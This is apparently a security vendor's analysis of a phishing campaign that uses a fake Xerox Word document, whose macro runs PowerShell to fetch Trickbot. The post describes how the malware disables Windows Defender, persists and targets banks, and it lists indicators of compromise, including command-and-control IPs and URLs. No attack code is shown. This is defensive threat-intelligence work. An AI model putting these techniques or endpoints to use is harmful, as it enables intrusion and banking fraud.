Fake Xerox Multifunction Printer Spam Campaign Overview
Recently a new malware campaign has been seen, in which an attacker is sending phishing emails to the victim with an attachment of Office Document in the Email.
An attachment contains a malicious document contains an obfuscated malicious macro script that attempts to connect their C&C server to automatically downloads the Trickbot malware in the background on the user’s machine with the help of PowerShell.
Flow Chart:
Technical Analysis of Fake Xerox Multifunction Printer Spam Campaign
File Name: xerox.doc
MD5: FEA55342279E4CD81D9407323C86B040
File Type: DOC
Spread Via: E-mail
Detail Description Fake Xerox Multifunction Printer Spam Campaign with Screenshot:
During execution of xerox.doc, it’s launch Microsoft Word application in Protected View Mode.
Figure 1 Enable Content (Macros Disabled)
By default, Microsoft Office Application has turned on the Protected Mode Feature & Also Disabled the Macro’s for security purposes.
In case, if the user disabled the protection mechanism & enabled the macro’s feature then the warning message notification didn’t pop up. And it will harm your system.
So, it’s always recommended to never disable the protection mode.
Get peace of mind! Get rid of malicious programs instantly
Free Checkup & fix for your PC! Get rid of malicious programs instantly!
In case, if the user clicks on the Enable Content button or doesn’t use Microsoft Default Protected View Mode, the Malicious macro will automatically download the payload into %temp% location with the help of Powershell.exe
%temp%\{Random name}.exe
As shown below, WINWORD.exe creates several processes
Figure 2 Process Tree
As shown below, xerox.doc contain obfuscated malicious macro which is not clearly visible and understandable by the normal user.
Figure 3 Obfuscated Macro Code
To understand the obfuscated code, a person needs to be expertise or having the skillset to deobfuscate this kind of obfuscated code.
By analyzing the above obfuscated macro code, we came to know that it's running the malicious PowerShell script in the background.
PowerShell script:
Figure 2 PS Script
As shown above, Bad actor scrambled the PowerShell script by storing the values in multiple variables and adding all the variables in the Invoke-Expression command.
By analyzing the above PowerShell script, we came to know that it attempts to connect their C&C Server if its active it will download the payload at following location C:\Users\admin\AppData\Local\Temp\WDGLXPI.exe
Thereupon, it automatically starts the downloaded payload process (WDGLXPI.exe) on the victim’s machine.
Once the Trickbot malware is downloaded (HASH: 05b995ea556c3116fff8b5b119e491eb), it automatically initiated by the powershell.exe as shown in the above PowerShell script.
Following is the process tree of the trickbot malware
Figure 3 Trickbot Process Tree
As shown above, Once the trickbot malware is activated then it deletes the windows defender service with the help of cmd.exe and sc.exe command. First, they stop the windows defender service and thereafter it deletes the windows defender service so, that windows defender didn’t detect their malicious behavior.
Figure 4 Service Deleted
As shown above, in the trickbot process tree after deleting the service it also attempts to disable the real-time monitoring through PowerShell command.
Thereafter, it copies itself into %appdata%\roaming\vcmsd\WEHMXPJ.exe
While the malware is running in the background it creates a task scheduler service with the name of MsSystemWatcher in C:\Windows\System32\Tasks
Trickbot malware drops the module and config files at following location C:\Users\admin.admin-PC\AppData\Roaming\vcmsd\Modules as you can see in the following screenshot:
Figure 5 Trickbot Modules & Config Files
As shown below trickbot malware injects the svchost.exe and initiated several processes of svchost.exe, cmd.exe ,net.exe, ipconfig.exe, nltest.exe
Figure 6 Svchost.exe Process Tree
As shown below, trickbot malware attempts to connect their C&C Server on following IP’s & URL to exchange the data.
3gihg5esw7lxg2wh.onion:448
92.38.135.78:447
185.252.213.94:447
31.148.219.201:447
185.82.218.51:447
185.174.173.173:447
As shown below it creates the user folder on their server
hxxps:// 118.200.151.113/ser0814/ADMIN-PC_xxx/64/injectDll/DEBG/browser /
Trickbot malware contains the list of some bank names for their targets following are the few names of them:
|
Wells Fargo Bank NA1604
|
NLB Nova Ljubljanska Banka d.d. Ljubljana
|
netteller.com
|
onlinebank.com
|
|
partnersfcu.org/OnlineBanking
|
ibb.firsttrustbank1.co.uk
|
netbanking.ubluk.com
|
my.sjpbank.co.uk
|
|
ebanking-ch2.ubs.com
|
ebank.turkishbank.co.uk
|
banking.triodos.co.uk
|
infinity.icicibank.co.uk
|
|
ibank.theaccessbankukltd.co.uk
|
www.standardlife.co.uk
|
www.youinvest.co.uk
|
ydsbank.com
|
|
secure.tddirectinvesting.co.uk
|
www.deutschebank-dbdirect.com
|
jpmcsso-uk.jpmorgan.com
|
secure.aldermorebusinesssavings.co.uk
|
IOC’s
Associated Hash
Filename:WDGLXPI.exe
MD5:05B995EA556C3116FFF8B5B119E491EB
SHA1:16EAAB0E799C4CA02867B75E7338CF5A113672E2
CRC32:B034BF12
SHA-256:0894C3EBDBBC33A7A6406511EED423C0321172C5306249F11B783EA83DE8E5E6
Filename:FAQ
MD5:1A8FBCFD74D3F43894DBA3D9B41806DE
SHA1:582E024AE7BFB507166C4F451568D7F7385EA8B4
CRC32:781A92BC
SHA-256:AEA4476B30AD66CE6BFC5D97A3B3DE9AF68666C2FF318E2F8DFD14AF0CABF0F5
Filename:info.dat
MD5:847948679F9EB942C38C12EA7B27B992
SHA1:B2DD957C591DB39C6A33F77A820CBD58AE21A1B1
CRC32:F65DE1A2
SHA-256:82E4248EA3326F824CCFC8AB0F40EBE4C79F2085199D7893C14E0A4B27A426F9
Filename:README.md
MD5:6B75B09B295113DB62B798FFA28F049A
SHA1:9C2B1C11593B6E2E020D96317C5C9EE290E98E79
CRC32:54AEC39F
SHA-256:7DC91CFE40E51C2880B40481611E6024638724C7BCCF23005BDC161CF14B306D
Filename:injectDll32
MD5:2E3B973AA67FDC9104498685AA02954C
SHA1:EF7AC76C22351FC3B3CCBFB115EA5E845D896787
CRC32:ADFCC5C8
SHA-256:6DA339B7451CC4ED60C1F3F26EBC6405F1E3C41D7D2CC0E9A2FE6590D12426ED
Filename:networkDll32
MD5:30562B6FE4D8EFDCE3783CDD0909FFE6
SHA1:05B8E3B60512EC12372B817814E436F39E2C801B
CRC32:CAED28C5
SHA-256:2BAB8BA30719A42213DB0087572E481F14DE7CDF7BFFE1A1BE17DB9F09D70525
Filename:systeminfo32
MD5:B3A9D059584418A2A0803FB0C6753EA9
SHA1:D19EF63CCEF78C785CBDE5008FBFE7721625D02F
CRC32:AE0D7F34
SHA-256:70DCCAA8296D3101E33F952EB2A927A21F428786F1F8DB724EAF918408E348CF
Filename:dinj
MD5:B6D1496A79DBD8395ADA9BA8502695E6
SHA1:2A41021423D02EF5A7B89F0528D8988C83CEAB9F
CRC32:E5EF3275
SHA-256:DC9FA7A21215C495117288E797E7F04CF805CA0EB3611F85055D393E14410945
Filename:dpost
MD5:ADB9D36A9DD0114214B3E61EC7C469F6
SHA1:667E3A824FF59A99B19613CC1DDA6960665D169F
CRC32:DC915ECF
SHA-256:5AC71D91988916BDD1397429E315D810438504337E1817002D2B2D997DE97D81
Filename:sinj
MD5:A1862E9728BE7990596DE96FBCC718CF
SHA1:6352E9829D401C07D4E5802913DD1B6CC47AA875
CRC32:4F6D7BCE
SHA-256:0A5345D92CC52B152FDA3E06EE3D049E825A9EBCC8CB15848C4F341ED654D7E3
Associated URL
hxxps:// 118.200.151.113/ser0814/ADMIN-PC_xxxxx/1/NJfuy7MRukSnP12PvuCjIxRTVp4/
hxxps:// 118.200.151.113/ser0814/ADMIN-PC_xxxxx/64/injectDll/VERS/browser/
Associated Path
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\info.dat
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\systeminfo32
C:\Users\admin.admin-pc\AppData\Roaming\Mozilla\Firefox\Profiles\renpv6dn.default\prefs.js
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\injectDll32_configs\sinj
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\injectDll32_configs\dpost
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\networkDll32
C:\Users\admin.admin-pc\AppData\Roaming\vcmsd\Modules\networkDll32_configs\dpost
Associated IP
3gihg5esw7lxg2wh.onion:448
92.38.135.78:447
185.252.213.94:447
31.148.219.201:447
185.82.218.51:447
185.174.173.173:447
Associated Registry Entry
|
HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\LanguageList
|
|
HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
|
|
HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
|
|
HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
|
|
HKU\.DEFAULT\Software\Classes\Local Settings\MuiCache\10B\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
|
|
HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob
|
Are you worried about your PC health?
Check your PC Health for Free!
Tips to Prevent virus and malware from Infecting Your System:
- Enable your popup blocker: Pop-ups and ads on the websites are the most adoptable tactic used by cybercriminals or developers with the core intention to spread malicious programs.
So, avoid clicking uncertain sites, software offers, pop-ups etc. and Install a powerful ad- blocker for Chrome, Mozilla, and IE
- Keep your Windows Updated: To avoid such infections, we recommend that you should always keep your system updated through automatic windows update.By doing this you can keep your device free from virus.According to the survey, outdated/older versions of Windows operating system are an easy target.
- Third-party installation: Try to avoid freeware download websites as they usually install bundled of software with any installer or stub file.
- Regular Backup: Regular and periodical backup helps you to keep your data safe in case the system is infected by any kind of virus or any other infection.Thus always backup important files regularly on a cloud drive or an external hard drive.
- Always have an Anti-Virus: Precaution is better than cure. We recommend that you install an antivirus like ITL Total Security or a good Malware Removal Tool like Download Virus RemovalTool
